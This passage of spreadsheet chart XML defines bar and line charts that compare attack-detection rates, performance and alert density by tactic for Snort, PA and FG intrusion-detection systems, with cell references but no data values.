              <c:f>'(D) - Análisis Resultados IV - '!$X$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$266:$V$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$266:$X$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="2135072967"/>
        <c:axId val="932624285"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2135072967"/>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932624285"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="932624285"/>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2135072967"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart119.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ ATAQUES - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.033600000000000005"/>
          <c:y val="0.05"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$316:$V$321</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$316:$W$321</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1731394743"/>
        <c:axId val="1722451879"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1731394743"/>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1722451879"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1722451879"/>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731394743"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart120.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ ATAQUES POR TÁCTICA - Snort VS PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$355</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$356:$K$369</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$356:$W$369</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$355</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$356:$K$369</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$356:$X$369</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$355</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$356:$K$369</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$356:$Y$369</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="2114307957"/>
        <c:axId val="1056391329"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2114307957"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1056391329"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1056391329"/>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2114307957"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart12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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>RENDIMIENTO Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$414</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="1800">
                    <a:latin typeface="Roboto"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$415:$V$420</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$415:$W$420</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1240871135"/>
        <c:axId val="1283182807"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1240871135"/>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1283182807"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1283182807"/>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Rendimiento</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240871135"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart12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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>COMPARATIVA GENERAL - DETECCIÓN EFICAZ ATAQUES</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$453</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="4285F4"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$452:$AB$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$453:$AB$453</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$454</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="EA4335"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$452:$AB$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$454:$AB$454</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$455</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FBBC04"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$452:$AB$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$455:$AB$455</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1875897774"/>
        <c:axId val="1999859995"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1875897774"/>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1999859995"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1999859995"/>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875897774"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart12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1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DENSIDAD DE ALERTAS POR TÁCTICA - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.025596816976127323"/>
          <c:y val="0.05"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$499</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$500:$K$513</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$500:$L$513</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$499</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$500:$K$513</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$500:$X$513</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$499</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$500:$K$513</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$500:$Y$513</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="118324000"/>
        <c:axId val="1593226915"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="118324000"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1593226915"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1593226915"/>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18324000"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart124.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>EFECTIVIDAD DE ALERTAS POR TÁCTICA - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$517</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$518:$K$531</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$518:$L$531</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$517</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$518:$K$531</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$518:$X$531</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$517</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$518:$K$531</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$518:$Y$531</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="750645848"/>
        <c:axId val="1595034955"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="750645848"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1595034955"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1595034955"/>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750645848"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart125.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PROCEDIMIENTOS DE IDENTIFICACIÓN - Snort vs PA vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$547</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$548:$V$553</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$548:$W$553</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$547</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$548:$V$553</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$548:$X$553</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1986929271"/>
        <c:axId val="2082697245"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1986929271"/>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2082697245"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2082697245"/>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986929271"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart126.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
